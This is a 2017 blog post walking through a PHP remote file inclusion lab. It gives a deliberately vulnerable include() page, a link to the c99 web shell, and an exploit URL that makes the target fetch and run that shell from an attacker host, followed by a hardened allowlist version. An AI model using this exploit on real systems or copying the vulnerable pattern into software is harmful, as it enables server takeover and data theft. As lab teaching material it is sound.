Friday, February 3, 2017

PHP Remote File Inclusion Example

Attacker IP: 192.168.56.1
Target IP: 192.168.56.23

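1- Allow URL includes by changing the option below in /etc/php/apache2/php.ini (PHP ships with this option off by default, so enabling it is what makes the lab target vulnerable):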
allow_url_include=1

2- Create a PHP file with the following content and host it on a website (in this lab it is served as /vul/index.php on the target host).
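<?php
// Deliberately vulnerable: the "file" request parameter goes to include() unchecked,
// so with allow_url_include=1 it can name a remote URL.
$incfile = $_REQUEST["file"];
include($incfile);
echo "Welcome Here!";
?>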



3- The attacker host also needs to serve a PHP shell: download the file from the link below and host it on a website.
https://raw.githubusercontent.com/tennc/webshell/master/web-malware-collection-13-06-2012/PHP/c99.txt

4- The following URL can then be used to gain a shell on the target host.
http://192.168.56.23/vul/index.php?file=http://192.168.56.1/c99.txt


Below is a screenshot of the shell, which we use to read /etc/passwd on the target host.
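A hardened counterpart to the index.php from step 2, added here as an example and not part of the original post: the file parameter is looked up in an allowlist of local files instead of being passed to include(). The page names and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example: hardened version of the vulnerable index.php above.
// The page names and the pages/ directory are assumptions, not from the post.

// Allowed request values mapped to local files; nothing else is ever included.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    // Reject arrays (file[]=...) and any value that is not an allowlist key.
    // A URL such as http://host/c99.txt is never a key, so it is never included.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$requested];
}

// Defence in depth: refuse to serve if the php.ini option from step 1 is enabled.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be disabled');
}

$path = resolve_page($_GET['file'] ?? 'home');
if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Page not found');
}

include $path;
echo "Welcome Here!";
```

With this version, the request from step 4 returns a 404 because the URL is not an allowlist key, and the script refuses to serve at all while allow_url_include is on.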

